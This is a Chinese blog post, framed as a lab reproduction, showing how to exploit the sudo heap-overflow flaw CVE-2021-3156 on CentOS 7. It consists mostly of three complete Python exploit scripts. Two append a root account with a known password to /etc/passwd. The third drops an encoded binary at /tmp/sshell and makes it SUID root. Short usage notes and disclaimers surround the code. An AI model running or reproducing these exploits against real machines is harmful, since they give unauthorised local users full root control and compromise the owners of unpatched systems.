实战中的sudo提权漏洞的使用姿势(CVE-2021-3156)

已于 2023-05-12 15:45:33 修改
阅读量3.9k 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 linux web安全 安全漏洞 python
于 2022-01-18 18:48:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45329947/article/details/122542928
版权

实战中的sudo提权漏洞的使用姿势

免责声明:

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

0x00 漏洞概述

2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。漏洞发生的原因在于sudo错误地转义了参数中的反斜杠。

0x01 漏洞原理

当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

0x02 受影响版本

Sudo 1.8.2 – 1.8.31p2
Sudo 1.9.0 – 1.9.5p1

0x03 不受影响版本

sudo =>1.9.5p2

0x04 漏洞复现(centos)

1.注意一点网上传的输入sudoedit -s / 然后查看回显这个方法不准确,一定要手动验证
2.注意一点如果是在webshell提取一定要用交互式的shell

复现POC1:

首先创建一个centos虚拟机,查看版本在这里插入图片描述
可以看到如上图,Linux版本是centos7.9 sudo版本是1.8.23
创建一个低权限账账户。在这里插入图片描述
使用一个python版本的,这个版本可以针对默认配置的centos进行攻击。
如果不想去下载可以直接复制下面的代码

#!/usr/bin/python
'''
Exploit for CVE-2021-3156 on CentOS 7 by sleepya

Simplified version of exploit_userspec.py for easy understanding.
- Remove all checking code
- Fixed all offset (no auto finding)

Note: This exploit only work on sudo 1.8.23 on CentOS 7 with default configuration

Note: Disable ASLR before running the exploit (also modify STACK_ADDR_PAGE below) if you don't want to wait for bruteforcing
'''
import os
import sys
import resource
from struct import pack
from ctypes import cdll, c_char_p, POINTER

SUDO_PATH = b"/usr/bin/sudo"  # can be used in execve by passing argv[0] as "sudoedit"

PASSWD_PATH = '/etc/passwd'
APPEND_CONTENT = b"gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash\n";

#STACK_ADDR_PAGE = 0x7fffffff1000  # for ASLR disabled
STACK_ADDR_PAGE = 0x7fffe5d35000

libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)

def execve(filename, cargv, cenvp):
	libc.execve(filename, cargv, cenvp)

def spawn_raw(filename, cargv, cenvp):
	pid = os.fork()
	if pid:
		# parent
		_, exit_code = os.waitpid(pid, 0)
		return exit_code
	else:
		# child
		execve(filename, cargv, cenvp)
		exit(0)

def spawn(filename, argv, envp):
	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(env))(*env)
	return spawn_raw(filename, cargv, cenvp)


resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))

# expect large hole for cmnd size is correct
TARGET_CMND_SIZE = 0x1b50

argv = [ "sudoedit", "-A", "-s", PASSWD_PATH, "A"*(TARGET_CMND_SIZE-0x10-len(PASSWD_PATH)-1)+"\\", None ]

SA = STACK_ADDR_PAGE

ADDR_REFSTR = pack('<Q', SA+0x20) # ref string

ADDR_PRIV_PREV = pack('<Q', SA+0x10)
ADDR_CMND_PREV = pack('<Q', SA+0x18) # cmndspec
ADDR_MEMBER_PREV = pack('<Q', SA+0x20)

ADDR_DEF_VAR = pack('<Q', SA+0x10)
ADDR_DEF_BINDING = pack('<Q', SA+0x30)

OFFSET = 0x30 + 0x20
ADDR_USER = pack('<Q', SA+OFFSET)
ADDR_MEMBER = pack('<Q', SA+OFFSET+0x40)
ADDR_CMND = pack('<Q', SA+OFFSET+0x40+0x30)
ADDR_PRIV = pack('<Q', SA+OFFSET+0x40+0x30+0x60)

# for spraying
epage = [
	'A'*0x8 + # to not ending with 0x00
	
	# fake def->var chunk (get freed)
	'\x21', '', '', '', '', '', '',
	ADDR_PRIV[:6], '',  # pointer to privilege
	ADDR_CMND[:6], '',  # pointer to cmndspec
	ADDR_MEMBER[:6], '',  # pointer to member
	
	# fake def->binding (list head) (get freed)
	'\x21', '', '', '', '', '', '',
	'', '', '', '', '', '', '', '',  # members.first
	'A'*0x10 + # members.last, pad
	
	# userspec chunk (get freed)
	'\x41', '', '', '', '', '', '', # chunk metadata
	'', '', '', '', '', '', '', '',  # entries.tqe_next
	'A'*8 +  # entries.tqe_prev
	'', '', '', '', '', '', '', '',  # users.tqh_first
	ADDR_MEMBER[:6]+'', '', # users.tqh_last
	'', '', '', '', '', '', '', '',  # privileges.tqh_first
	ADDR_PRIV[:6]+'', '', # privileges.tqh_last
	'', '', '', '', '', '', '', '',  # comments.stqh_first
	
	# member chunk
	'\x31', '', '', '', '', '', '', # chunk size , userspec.comments.stqh_last (can be any)
	'A'*8 + # member.tqe_next (can be any), userspec.lineno (can be any)
	ADDR_MEMBER_PREV[:6], '',  # member.tqe_prev, userspec.file (ref string)
	'A'*8 + # member.name (can be any because this object is not freed)
	pack('<H', 284), '',  # type, negated
	'A'*0xc+ # padding
	
	# cmndspec chunk
	'\x61'*0x8 + # chunk metadata (need only prev_inuse flag)
	'A'*0x8 + # entries.tqe_next
	ADDR_CMND_PREV[:6], '',  # entries.teq_prev
	'', '', '', '', '', '', '', '',  # runasuserlist
	'', '', '', '', '', '', '', '',  # runasgrouplist
	ADDR_MEMBER[:6], '',  # cmnd
	'\xf9'+'\xff'*0x17+ # tag (NOPASSWD), timeout, notbefore, notafter
	'', '', '', '', '', '', '', '',  # role
	'', '', '', '', '', '', '', '',  # type
	'A'*8 + # padding
	
	# privileges chunk
	'\x51'*0x8 + # chunk metadata
	'A'*0x8 + # entries.tqe_next
	ADDR_PRIV_PREV[:6], '',  # entries.teq_prev
	'A'*8 + # ldap_role
	'A'*8 + # hostlist.tqh_first
	ADDR_MEMBER[:6], '',  # hostlist.teq_last
	'A'*8 +  # cmndlist.tqh_first
	ADDR_CMND[:6], '',  # cmndlist.teq_last
]

cnt = sum(map(len, epage))
padlen = 4096 - cnt - len(epage)
epage.append('P'*(padlen-1))

env = [
	"A"*(7+0x4010 + 0x110) + # overwrite until first defaults
	"\x21\\", "\\", "\\", "\\", "\\", "\\", "\\", 
	"A"*0x18 + 
	# defaults
	"\x41\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # next
	'a'*8 + # prev
	ADDR_DEF_VAR[:6]+'\\', '\\', # var
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # val
	ADDR_DEF_BINDING[:6]+'\\', '\\', # binding
	ADDR_REFSTR[:6]+'\\', '\\',  # file
	"Z"*0x8 +  # type, op, error, lineno
	"\x31\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size (just need valid)
	'C'*0x638+  # need prev_inuse and overwrite until userspec
	'B'*0x1b0+
	# userspec chunk
	# this chunk is not used because list is traversed with curr->prev->prev->next
	"\x61\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size
	ADDR_USER[:6]+'\\', '\\', # entries.tqe_next points to fake userspec in stack
	"A"*8 + # entries.tqe_prev
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",  # users.tqh_first
	ADDR_MEMBER[:6]+'\\', '\\', # users.tqh_last
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "",  # privileges.tqh_first
	
	"LC_ALL=C",
	"SUDO_EDITOR=/usr/bin/tee -a", # append stdin to /etc/passwd
	"TZ=:",
]

ENV_STACK_SIZE_MB = 4
for i in range(ENV_STACK_SIZE_MB * 1024 / 4):
	env.extend(epage)

# last element. prepare space for '/usr/bin/sudo' and extra 8 bytes
env[-1] = env[-1][:-len(SUDO_PATH)-1-8]

env.append(None)

cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env)

# write passwd line in stdin. it will be added to /etc/passwd when success by "tee -a"
r, w = os.pipe()
os.dup2(r, 0)
w = os.fdopen(w, 'w')
w.write(APPEND_CONTENT)
w.close()

null_fd = os.open('/dev/null', os.O_RDWR)
os.dup2(null_fd, 2)

for i in range(8192):
	sys.stdout.write('%d\r' % i)
	if i % 8 == 0:
		sys.stdout.flush()
	exit_code = spawn_raw(SUDO_PATH, cargv, cenvp)
	if exit_code == 0:
		print("success at %d" % i)
		break

使用低权限账户运行exploit_cent7_userspec.py
像这种运行结束什么也没显示就是失败了。
在这里插入图片描述
如果运行失败的话多运行几遍,有的运行5.6遍才运行成功,这是第二次运行的,可以看到已经运行成功。
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash success at 490
后面这个490表示运行第490次成功。
在这里插入图片描述
成功之后会自动生成一个用户名为gg,密码为gg的root权限用户,成功提权,whoami可以看到是root权限
在这里插入图片描述

复现POC2:

这个POC是吐司上面下载的。

#!/usr/bin/python
import os
import sys
import resource
from struct import pack
from ctypes import cdll, c_char_p, POINTER

SUDO_PATH = b"/usr/bin/sudo"

PASSWD_PATH = '/etc/passwd'
APPEND_CONTENT = b"aa:$5$AZaSmJBP$lsgF8hex//kd.G4XxUJGaS618ZtYoQ796UpkM/8Ucm3:0:0:gg:/root:/bin/bash\n";

#STACK_ADDR_PAGE = 0x7fffffff1000  # for ASLR disabled
STACK_ADDR_PAGE = 0x7fffe5d35000

libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)

def execve(filename, cargv, cenvp):
	libc.execve(filename, cargv, cenvp)

def spawn_raw(filename, cargv, cenvp):
	pid = os.fork()
	if pid:
		# parent
		_, exit_code = os.waitpid(pid, 0)
		return exit_code
	else:
		# child
		execve(filename, cargv, cenvp)
		exit(0)

def spawn(filename, argv, envp):
	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(env))(*env)
	return spawn_raw(filename, cargv, cenvp)


resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))

# expect large hole for cmnd size is correct
TARGET_CMND_SIZE = 0x1b50

argv = [ "sudoedit", "-A", "-s", PASSWD_PATH, "A"*(TARGET_CMND_SIZE-0x10-len(PASSWD_PATH)-1)+"\\", None ]

SA = STACK_ADDR_PAGE

ADDR_REFSTR = pack('<Q', SA+0x20) # ref string

ADDR_PRIV_PREV = pack('<Q', SA+0x10)
ADDR_CMND_PREV = pack('<Q', SA+0x18) # cmndspec
ADDR_MEMBER_PREV = pack('<Q', SA+0x20)

ADDR_DEF_VAR = pack('<Q', SA+0x10)
ADDR_DEF_BINDING = pack('<Q', SA+0x30)

OFFSET = 0x30 + 0x20
ADDR_USER = pack('<Q', SA+OFFSET)
ADDR_MEMBER = pack('<Q', SA+OFFSET+0x40)
ADDR_CMND = pack('<Q', SA+OFFSET+0x40+0x30)
ADDR_PRIV = pack('<Q', SA+OFFSET+0x40+0x30+0x60)

# for spraying
epage = [
	'A'*0x8 + # to not ending with 0x00
	
	# fake def->var chunk (get freed)
	'\x21', '', '', '', '', '', '',
	ADDR_PRIV[:6], '',  # pointer to privilege
	ADDR_CMND[:6], '',  # pointer to cmndspec
	ADDR_MEMBER[:6], '',  # pointer to member
	
	# fake def->binding (list head) (get freed)
	'\x21', '', '', '', '', '', '',
	'', '', '', '', '', '', '', '',  # members.first
	'A'*0x10 + # members.last, pad
	
	# userspec chunk (get freed)
	'\x41', '', '', '', '', '', '', # chunk metadata
	'', '', '', '', '', '', '', '',  # entries.tqe_next
	'A'*8 +  # entries.tqe_prev
	'', '', '', '', '', '', '', '',  # users.tqh_first
	ADDR_MEMBER[:6]+'', '', # users.tqh_last
	'', '', '', '', '', '', '', '',  # privileges.tqh_first
	ADDR_PRIV[:6]+'', '', # privileges.tqh_last
	'', '', '', '', '', '', '', '',  # comments.stqh_first
	
	# member chunk
	'\x31', '', '', '', '', '', '', # chunk size , userspec.comments.stqh_last (can be any)
	'A'*8 + # member.tqe_next (can be any), userspec.lineno (can be any)
	ADDR_MEMBER_PREV[:6], '',  # member.tqe_prev, userspec.file (ref string)
	'A'*8 + # member.name (can be any because this object is not freed)
	pack('<H', 284), '',  # type, negated
	'A'*0xc+ # padding
	
	# cmndspec chunk
	'\x61'*0x8 + # chunk metadata (need only prev_inuse flag)
	'A'*0x8 + # entries.tqe_next
	ADDR_CMND_PREV[:6], '',  # entries.teq_prev
	'', '', '', '', '', '', '', '',  # runasuserlist
	'', '', '', '', '', '', '', '',  # runasgrouplist
	ADDR_MEMBER[:6], '',  # cmnd
	'\xf9'+'\xff'*0x17+ # tag (NOPASSWD), timeout, notbefore, notafter
	'', '', '', '', '', '', '', '',  # role
	'', '', '', '', '', '', '', '',  # type
	'A'*8 + # padding
	
	# privileges chunk
	'\x51'*0x8 + # chunk metadata
	'A'*0x8 + # entries.tqe_next
	ADDR_PRIV_PREV[:6], '',  # entries.teq_prev
	'A'*8 + # ldap_role
	'A'*8 + # hostlist.tqh_first
	ADDR_MEMBER[:6], '',  # hostlist.teq_last
	'A'*8 +  # cmndlist.tqh_first
	ADDR_CMND[:6], '',  # cmndlist.teq_last
]

cnt = sum(map(len, epage))
padlen = 4096 - cnt - len(epage)
epage.append('P'*(padlen-1))

env = [
	"A"*(7+0x4010 + 0x110) + # overwrite until first defaults
	"\x21\\", "\\", "\\", "\\", "\\", "\\", "\\", 
	"A"*0x18 + 
	# defaults
	"\x41\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # next
	'a'*8 + # prev
	ADDR_DEF_VAR[:6]+'\\', '\\', # var
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # val
	ADDR_DEF_BINDING[:6]+'\\', '\\', # binding
	ADDR_REFSTR[:6]+'\\', '\\',  # file
	"Z"*0x8 +  # type, op, error, lineno
	"\x31\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size (just need valid)
	'C'*0x638+  # need prev_inuse and overwrite until userspec
	'B'*0x1b0+
	# userspec chunk
	# this chunk is not used because list is traversed with curr->prev->prev->next
	"\x61\\", "\\", "\\", "\\", "\\", "\\", "\\", # chunk size
	ADDR_USER[:6]+'\\', '\\', # entries.tqe_next points to fake userspec in stack
	"A"*8 + # entries.tqe_prev
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",  # users.tqh_first
	ADDR_MEMBER[:6]+'\\', '\\', # users.tqh_last
	"\\", "\\", "\\", "\\", "\\", "\\", "\\", "",  # privileges.tqh_first
	
	"LC_ALL=C",
	"SUDO_EDITOR=/usr/bin/tee -a", # append stdin to /etc/passwd
	"TZ=:",
]

ENV_STACK_SIZE_MB = 4
for i in range(ENV_STACK_SIZE_MB * 1024 / 4):
	env.extend(epage)

# last element. prepare space for '/usr/bin/sudo' and extra 8 bytes
env[-1] = env[-1][:-len(SUDO_PATH)-1-8]

env.append(None)

cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env)

# write passwd line in stdin. it will be added to /etc/passwd when success by "tee -a"
r, w = os.pipe()
os.dup2(r, 0)
w = os.fdopen(w, 'w')
w.write(APPEND_CONTENT)
w.close()

null_fd = os.open('/dev/null', os.O_RDWR)
os.dup2(null_fd, 2)

for i in range(8192):
	sys.stdout.write('%d\r' % i)
	if i % 8 == 0:
		sys.stdout.flush()
	exit_code = spawn_raw(SUDO_PATH, cargv, cenvp)
	if exit_code == 0:
		print("success at %d" % i)
		break

跟上面一样的操作,唯一不同的是这个poc运行成功会生成一个用户名为aa 密码为 wwwroot用户
还有就是这个poc只能适用于默认配置的centos7
成功运行。
在这里插入图片描述

复现POC3:

这个POC跟上面poc2都是吐司的,然后这个poc有点不一样的是运行成功之后输入目录/tmp/sshell可以直接进入root权限。

#!/usr/bin/python
import os
import subprocess
import sys
import resource
import select
import signal
from struct import pack
from ctypes import cdll, c_char_p, POINTER

SUDO_PATH = b"/usr/bin/sudo"

SHELL_PATH = b"/tmp/gg" # a shell script file executed by sudo (max length is 31)
SUID_PATH = "/tmp/sshell" # a file that will be owned by root and suid
PWNED_PATH = "/tmp/pwned" # a file that will be created after SHELL_PATH is executed

libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)

resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))

def create_bin(bin_path):
	if os.path.isfile(bin_path):
		return  # existed
	try:
		os.makedirs(bin_path[:bin_path.rfind('/')])
	except:
		pass
	
	import base64, zlib
	bin_b64 = 'eNqrd/VxY2JkZIABJgY7BhCvgsEBzHdgwAQODBYMMB0gmhVNFpmeCuXBaAYBCJWVGcHPmpUFJDx26Cdl5ukXZzAEhMRnWUfM5GcFAGyiDWs='
	with open(bin_path, 'wb') as f:
		f.write(zlib.decompress(base64.b64decode(bin_b64)))

def create_shell(path, suid_path):
	with open(path, 'w') as f:
		f.write('#!/bin/sh\n')
		f.write('/usr/bin/id >> %s\n' % PWNED_PATH)
		f.write('/bin/chown root.root %s\n' % suid_path)
		f.write('/bin/chmod 4755 %s\n' % suid_path)
	os.chmod(path, 0o755)
		
def execve(filename, cargv, cenvp):
	libc.execve(filename, cargv, cenvp)

def spawn_raw(filename, cargv, cenvp):
	pid = os.fork()
	if pid:
		# parent
		_, exit_code = os.waitpid(pid, 0)
		return exit_code
	else:
		# child
		execve(filename, cargv, cenvp)
		exit(0)

def spawn(filename, argv, envp):
	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(envp))(*envp)
	# Note: error with backtrace is print to tty directly. cannot be piped or suppressd
	r, w = os.pipe()
	pid = os.fork()
	if not pid:
		# child
		os.close(r)
		os.dup2(w, 2)
		execve(filename, cargv, cenvp)
		exit(0)
	# parent
	os.close(w)
	# might occur deadlock in heap. kill it if timeout and set exit_code as 6
	# 0.5 second should be enough for execution
	sr, _, _ = select.select([ r ], [], [], 0.5)
	if not sr:
		os.kill(pid, signal.SIGKILL)
	_, exit_code = os.waitpid(pid, 0)
	if not sr: # timeout, assume dead lock in heap
		exit_code = 6
	
	if 128 < exit_code < 256:
		exit_code -= 128
	r = os.fdopen(r, 'r')
	err = r.read()
	r.close()
	return exit_code, err

def has_askpass(err):
	# 'sudoedit: no askpass program specified, try setting SUDO_ASKPASS'
	return 'sudoedit: no askpass program ' in err

def get_sudo_version():
	proc = subprocess.Popen([SUDO_PATH, '-V'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
	for line in proc.stdout:
		line = line.strip()
		if not line:
			continue
		if line.startswith('Sudo '):
			txt = line[12:].strip()
			pos = txt.rfind('p')
			if pos != -1:
				txt = txt[:pos]
			versions = list(map(int, txt.split('.')))
			break
	
	proc.wait()
	return versions

def check_sudo_version():
	sudo_vers = get_sudo_version()
	assert sudo_vers[0] == 1, "Unexpect sudo major version"
	assert sudo_vers[1] == 8, "Unexpect sudo minor version"
	return sudo_vers[2]

def check_mailer_root():
	if not os.access(SUDO_PATH, os.R_OK):
		print("Cannot determine disble-root-mailer flag")
		return True
	return subprocess.call(['grep', '-q', 'disable-root-mailer', SUDO_PATH]) == 1

def find_cmnd_size():
	argv = [ b"sudoedit", b"-A", b"-s", b"", None ]
	env = [ b'A'*(7+0x4010+0x110-1), b"LC_ALL=C", b"TZ=:", None ]
	
	size_min, size_max = 0xc00, 0x2000
	found_size = 0
	while size_max - size_min > 0x10:
		curr_size = (size_min + size_max) // 2
		curr_size &= 0xfff0
		print("\ncurr size: 0x%x" % curr_size)
		argv[-2] = b"\xfc"*(curr_size-0x10)+b'\\'
		exit_code, err = spawn(SUDO_PATH, argv, env)
		print("\nexit code: %d" % exit_code)
		print(err)
		if exit_code == 256 and has_askpass(err):
			# need pass. no crash.
			# fit or almost fit
			if found_size:
				found_size = curr_size
				break
			# maybe almost fit. try again
			found_size = curr_size
			size_min = curr_size
			size_max = curr_size + 0x20
		elif exit_code in (7, 11):
			# segfault. too big
			if found_size:
				break
			size_max = curr_size
		else:
			assert exit_code == 6
			# heap corruption. too small
			size_min = curr_size
	
	if found_size:
		return found_size
	assert size_min == 0x2000 - 0x10
	# old sudo version and file is in /etc/sudoers.d
	print('has 2 holes. very large one is bad')
	
	size_min, size_max = 0xc00, 0x2000
	for step in (0x400, 0x100, 0x40, 0x10):
		found = False
		env[0] = b'A'*(7+0x4010+0x110-1+step+0x100)
		for curr_size in range(size_min, size_max, step):
			argv[-2] = b"A"*(curr_size-0x10)+b'\\'
			exit_code, err = spawn(SUDO_PATH, argv, env)
			print("\ncurr size: 0x%x" % curr_size)
			print("\nexit code: %d" % exit_code)
			print(err)
			if exit_code in (7, 11):
				size_min = curr_size
				found = True
			elif found:
				print("\nsize_min: 0x%x" % size_min)
				break
		assert found, "Cannot find cmnd size"
		size_max = size_min + step
	
	# TODO: verify		
	return size_min

def find_defaults_chunk(argv, env_prefix):
	offset = 0
	pos = len(env_prefix) - 1
	env = env_prefix[:]
	env.extend([ b"LC_ALL=C", b"TZ=:", None ])
	# overflow until sudo crash without asking pass
	# crash because of defaults.entries.next is overwritten
	while True:
		env[pos] += b'A'*0x10
		exit_code, err = spawn(SUDO_PATH, argv, env)
		# 7 bus error, 11 segfault
		if exit_code in (7, 11) and not has_askpass(err):
			# found it
			env[pos] = env[pos][:-0x10]
			break
		offset += 0x10
	
	# verify if it is defaults
	env = env[:-3]
	env[-1] += b'\x41\\' # defaults chunk size 0x40
	env.extend([
		b'\\', b'\\', b'\\', b'\\', b'\\', b'\\',
		(b'' if has_tailq else b'A'*8) + # prev if no tailq
		b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", # entries.next
		(b'A'*8 if has_tailq else b'') + # entries.prev
		pack("<Q", 0xffffffffff600000+0x880) + # var (use vsyscall for testing)
		b"A"*(0x20-1), # binding, file, type, op, error, lineno
		b"LC_ALL=C", b"TZ=:", None
	])
	
	exit_code, err = spawn(SUDO_PATH, argv, env)
	# old sudo verion has no cleanup if authen fail. exit code is 256.
	assert exit_code in (256, 11) and has_askpass(err), "cannot find defaults chunk"
	return offset

def create_env(offset_defaults):
	with open('/proc/sys/kernel/randomize_va_space') as f:
		has_aslr = int(f.read()) != 0
	if has_aslr:
		STACK_ADDR_PAGE = 0x7fffe5d35000
	else:
		STACK_ADDR_PAGE = 0x7fffffff1000  # for ASLR disabled
	
	SA = STACK_ADDR_PAGE

	ADDR_MEMBER_PREV = pack('<Q', SA+8)
	ADDR_MEMBER_LAST = ADDR_MEMBER_PREV

	ADDR_MEMBER = pack('<Q', SA+0x20)
	ADDR_DEF_BINDING = ADDR_MEMBER

	ADDR_MAILER_VAR = pack('<Q', SA+0x20+0x30)
	ADDR_MAILER_VAL = pack('<Q', SA+0x20+0x30+0x10)

	ADDR_ALWAYS_VAR = pack('<Q', SA+0x20+0x30+0x10+0x20)
	ADDR_DEF_BAD    = pack('<Q', SA+0x20+0x30+0x10+0x20+0x10)

	# no need to make cleanup without a crash. mailer is executed before cleanup steps
	# def_mailto is always set
	# def_mailerflags is mailer arguments
	epage = [
		b'A'*0x8 + # to not ending with 0x00
		
		ADDR_MEMBER[:6], b'',  # pointer to member
		ADDR_MEMBER_PREV[:6], b'',  # pointer to member
		
		# member chunk (and defaults->binding (list head))
		b'A'*8 + # chunk size
		b'', b'', b'', b'', b'', b'', b'', b'', # members.first
		ADDR_MEMBER_LAST[:6], b'', # members.last
		b'A'*8 + # member.name (can be any because this object is freed as list head (binding))
		pack('<H', MATCH_ALL), b'',  # type, negated
		b'A'*0xc + # padding
		
		# var (mailer)
		b'A'*8 + # chunk size
		b"mailerpath", b'A'*5 + 
		# val (mailer) (assume path length is less than 32)
		SHELL_PATH, b'A'*(0x20-len(SHELL_PATH)-1) + 
		# var (mail_always)
		b"mail_always", b'A'*4 + 
		
		# defaults (invalid mail_always, has val)
		(b'' if has_tailq else b'A'*8) + # prev if no tailq
		b'', b'', b'', b'', b'', b'', b'', b'', # next
		(b'A'*8 if has_tailq else b'') + # prev if has tailq
		ADDR_ALWAYS_VAR[:6], b'', # var
		ADDR_ALWAYS_VAR[:6], b'', # val (invalid defaults mail_always, trigger sendmail immediately)
		ADDR_DEF_BINDING[:6], b'', # binding or binding.first
	]
	if has_file:
		epage.extend([ ADDR_ALWAYS_VAR[:6], b'' ]) # file
	elif not has_tailq:
		epage.extend([ ADDR_MEMBER[:6], b'' ]) # binding.last
	epage.extend([
		pack('<H', DEFAULTS_CMND) + # type
		b'', b'', # for type is 4 bytes version
	])

	env = [
		b'A'*(7+0x4010+0x110+offset_defaults) +
		b'A'*8 + # chunk metadata
		(b'' if has_tailq else b'A'*8) + # prev if no tailq
		ADDR_DEF_BAD[:6]+b'\\', b'\\', # next
		(b'A'*8 if has_tailq else b'') + # prev if has tailq
		ADDR_MAILER_VAR[:6]+b'\\', b'\\', # var
		ADDR_MAILER_VAL[:6]+b'\\', b'\\', # val
		ADDR_DEF_BINDING[:6]+b'\\', b'\\', # binding or bind.first
	]
	if has_file or not has_tailq:
		env.extend([ ADDR_MEMBER[:6]+b'\\', b'\\' ]) # binding.last or file (no use)
	env.extend([
		pack('<H', DEFAULTS_CMND) + # type
		(b'\x01' if has_file else b'\\'), b'', # if not has_file, type is int (4 bytes)
		b"LC_ALL=C",
		b"TZ=:",
		b"SUDO_ASKPASS=/invalid",
	])

	cnt = sum(map(len, epage))
	padlen = 4096 - cnt - len(epage)
	epage.append(b'P'*(padlen-1))

	ENV_STACK_SIZE_MB = 4
	for i in range(ENV_STACK_SIZE_MB * 1024 // 4):
		env.extend(epage)

	# reserve space in last element for '/usr/bin/sudo' and padding
	env[-1] = env[-1][:-14-8]
	env.append(None)
	return env

def run_until_success(argv, env):
	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(env))(*env)

	create_bin(SUID_PATH)
	create_shell(SHELL_PATH, SUID_PATH)

	null_fd = os.open('/dev/null', os.O_RDWR)
	os.dup2(null_fd, 2)

	for i in range(65536):
		sys.stdout.write('%d\r' % i)
		if i % 8 == 0:
			sys.stdout.flush()
		exit_code = spawn_raw(SUDO_PATH, cargv, cenvp)
		if os.path.exists(PWNED_PATH):
			print("success at %d" % i)
			if os.stat(PWNED_PATH).st_uid != 0:
				print("ROOT MAILER is disabled :(")
			break
		if exit_code not in (7, 11):
			print("invalid offset. exit code: %d" % exit_code)
			break

def main():
	cmnd_size = int(sys.argv[1], 0) if len(sys.argv) > 1 else None
	offset_defaults = int(sys.argv[2], 0) if len(sys.argv) > 2 else None

	if cmnd_size is None:
		cmnd_size = find_cmnd_size()
		print("found cmnd size: 0x%x" % cmnd_size)

	argv = [ b"sudoedit", b"-A", b"-s", b"A"*(cmnd_size-0x10)+b"\\", None ]

	env_prefix = [ b'A'*(7+0x4010+0x110) ]

	if offset_defaults is None:
		offset_defaults = find_defaults_chunk(argv, env_prefix)
	assert offset_defaults != -1

	print('')
	print("cmnd size: 0x%x" % cmnd_size)
	print("offset to defaults: 0x%x" % offset_defaults)

	argv = [ b"sudoedit", b"-A", b"-s", b"A"*(cmnd_size-0x10)+b"\\", None ]
	env = create_env(offset_defaults)
	run_until_success(argv, env)

if __name__ == "__main__":
	# global intialization
	assert check_mailer_root(), "root mailer is disabled"
	sudo_ver = check_sudo_version()
	DEFAULTS_CMND = 269
	if sudo_ver >= 15:
		MATCH_ALL = 284
	elif sudo_ver >= 13:
		MATCH_ALL = 282
	elif sudo_ver >= 7:
		MATCH_ALL = 280
	elif sudo_ver < 7:
		MATCH_ALL = 279
		DEFAULTS_CMND = 268

	has_tailq = sudo_ver >= 9
	has_file = sudo_ver >= 19  # has defaults.file pointer
	main()

成功运行
在这里插入图片描述
可以看到是root权限
在这里插入图片描述
使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

免责声明:

仅限授权安全测试使用,禁止未授权非法攻击站点。本文章仅供学习和研究使用。严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

网安君
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现】CVE-2023-22809 sudo提权漏洞
hack0919的博客
05-20 1221
漏洞等级:高危
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
CVE-2021-3156:Sudo男爵Samedit漏洞
03-25
CVE-2021-3156Sudo男爵Samedit) 该存储库是针对Linux x64的CVE-2021-3156漏洞利用。 如需撰写文章,请访问 。 档案文件 使用tcache在glibc上利用 exploit_nss.py自动检测/etc/nsswitch.conf的所有要求和条目数 exploit_nss_manual.py exploit_nss.py的简化版本,可以更好地利用漏洞 exploit_timestamp_race.c覆盖def_timestamp和竞争条件以修改/ etc / passwd 在没有tcache的情况下利用glibc exploit_defaults_mailer.py漏洞利用覆盖结构默认值来修改邮件程序二进制路径。 它要求sudo编译时没有禁用root-mailer,例如CentOS 6和7。 exploit_userspec.py漏洞利用
